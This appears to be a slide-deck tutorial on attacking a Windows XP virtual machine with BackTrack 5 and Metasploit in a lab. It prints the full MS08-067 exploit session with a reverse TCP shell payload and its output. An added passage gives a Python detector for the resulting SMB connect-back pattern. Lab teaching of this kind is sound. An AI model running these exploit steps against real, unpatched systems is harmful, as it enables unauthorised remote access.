Backtrack 5

BACKTRACK 5 …LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE AN XP MACHINE

description

An easy way to see: what is BackTrack? What is it meant for? How do we attack an XP machine? With screenshots and download source details.

Transcript of Backtrack 5

Page 1: Backtrack 5

BACKTRACK 5

…LEARN TO CONFIG AND RUN COMMANDS TO PENETRATE AN XP MACHINE

Page 2: Backtrack 5

FIRSTLY……

• DOWNLOAD BACKTRACK vmx format FROM http://www.backtrack-linux.org/downloads/

Page 3: Backtrack 5

SECONDLY……….

• Run VMWARE and load xp machine and the backtrack vmx machine.

• In this VM lab…the XP machine terminal is attacked by the BT terminal

Page 4: Backtrack 5

THIRDLY…….config IP address to BT machine

Here the IP configured is 80.0.2.251

Page 5: Backtrack 5

FOURTHLY…….config IP address to XP machine

Here the IP configured is 80.0.2.252

Page 6: Backtrack 5

FIFTHLY………..

• NOW JUST TO MAKE A SMALL CHECK OF CONNECTIONS…..DO THE BRIDGING AND PING BOTH THE MACHINES FROM BOTH TERMINALS

Page 7: Backtrack 5

SIXTHLY…..run the following on the BT terminal

• root@bt:~# cd /pentest/exploits/framework3

• root@bt:/pentest/exploits/framework3#

• root@bt:/pentest/exploits/framework3# ./msfconsole

• o 8 o o

• 8 8 8

• ooYoYo. .oPYo. o8P .oPYo. .oPYo. .oPYo. 8 .oPYo. o8 o8P

• 8' 8 8 8oooo8 8 .oooo8 Yb.. 8 8 8 8 8 8 8

• 8 8 8 8. 8 8 8 'Yb. 8 8 8 8 8 8 8

• 8 8 8 `Yooo' 8 `YooP8 `YooP' 8YooP' 8 `YooP' 8 8

• ..:..:..:.....:::..::.....::.....:8.....:..:.....::..::..:

• ::::::::::::::::::::::::::::::::::8:::::::::::::::::::::::

• ::::::::::::::::::::::::::::::::::::::::::::::::::::::::::

• =[ metasploit v3.7.0-release [core:3.7 api:1.0]

• + -- --=[ 684 exploits - 355 auxiliary

• + -- --=[ 217 payloads - 27 encoders - 8 nops

• =[ svn r12536 updated 169 days ago (2011.05.04)

• Warning: This copy of the Metasploit Framework was last updated 169 days ago.

• We recommend that you update the framework at least every other day.

• For information on updating your copy of Metasploit, please see:

• http://www.metasploit.com/redmine/projects/framework/wiki/Updating

• msf >

RED DENOTES THE COMMANDS TO BE TYPED….minimal!!!!

Page 8: Backtrack 5

• msf >

• msf > use exploit/windows/smb/ms08_067_netapi

• msf exploit(ms08_067_netapi) > set RHOST 80.0.2.252

• RHOST => 80.0.2.252

• msf exploit(ms08_067_netapi) > set LHOST 80.0.2.251

• LHOST => 80.0.2.251

• msf exploit(ms08_067_netapi) > set PAYLOAD windows/shell/reverse_tcp

• PAYLOAD => windows/shell/reverse_tcp

• msf exploit(ms08_067_netapi) > exploit

• [*] Started reverse handler on 80.0.2.251:4444

• [*] Automatically detecting the target...

• [*] Fingerprint: Windows XP - Service Pack 3 - lang:English

• [*] Selected Target: Windows XP SP3 English (NX)

• [*] Attempting to trigger the vulnerability...

• [*] Sending stage (240 bytes) to 80.0.2.252

• [*] Command shell session 1 opened (80.0.2.251:4444 -> 80.0.2.252:1133) at 2011-10-20 05:15:55 -0400

• Microsoft Windows XP [Version 5.1.2600]

• (C) Copyright 1985-2001 Microsoft Corp.

• C:\WINDOWS\system32> u r done!!!!!!!!!!!!!!!!!!

RED DENOTES THE COMMANDS TO BE TYPED….minimal!!!!
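
The session above leaves a recognisable trace on the network: the XP machine (80.0.2.252) receives an SMB connection from 80.0.2.251 and seconds later opens its own connection back to that host on port 4444. The following is an added detection example, not part of the original slides; the flow-log format, the 30-second window and the function names are assumptions, and the sample records are constructed.

```python
from datetime import datetime, timedelta

SMB_PORT = 445  # MS08-067 is reached through the SMB service

# Constructed flow records: time, source IP, source port, dest IP, dest port.
# Lab addresses and port 4444 follow the transcript; everything else is made up.
SAMPLE_FLOWS = """\
2011-10-20T05:15:50 80.0.2.251 51234 80.0.2.252 445
2011-10-20T05:15:55 80.0.2.252 1133 80.0.2.251 4444
2011-10-20T05:20:00 80.0.2.252 1140 80.0.2.10 80
2011-10-20T06:00:00 80.0.2.10 40000 80.0.2.252 445
2011-10-20T06:10:00 80.0.2.252 1150 80.0.2.10 8080
"""


def parse_flows(text):
    """Turn whitespace-separated flow lines into time-ordered tuples."""
    flows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        ts, src, sport, dst, dport = line.split()
        flows.append((datetime.fromisoformat(ts), src, int(sport), dst, int(dport)))
    return sorted(flows)


def find_connect_backs(flows, window=timedelta(seconds=30)):
    """Flag an SMB server that opens a connection back to a recent SMB client."""
    last_smb = {}  # (client, server) -> time of the latest inbound SMB connection
    alerts = []
    for ts, src, sport, dst, dport in flows:
        if dport == SMB_PORT:
            last_smb[(src, dst)] = ts
            continue
        seen = last_smb.get((dst, src))  # did dst recently reach src over SMB?
        if seen is not None and ts - seen <= window:
            alerts.append({"server": src, "client": dst, "dport": dport,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_connect_backs(parse_flows(SAMPLE_FLOWS)):
        print("connect-back after SMB:", alert)
```

Only the 05:15:55 record is flagged; the later connection to 80.0.2.10 falls outside the window, and the 05:20:00 one has no preceding SMB session from that peer.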

Page 11: Backtrack 5

• Any questions????

…please message or mail at [email protected]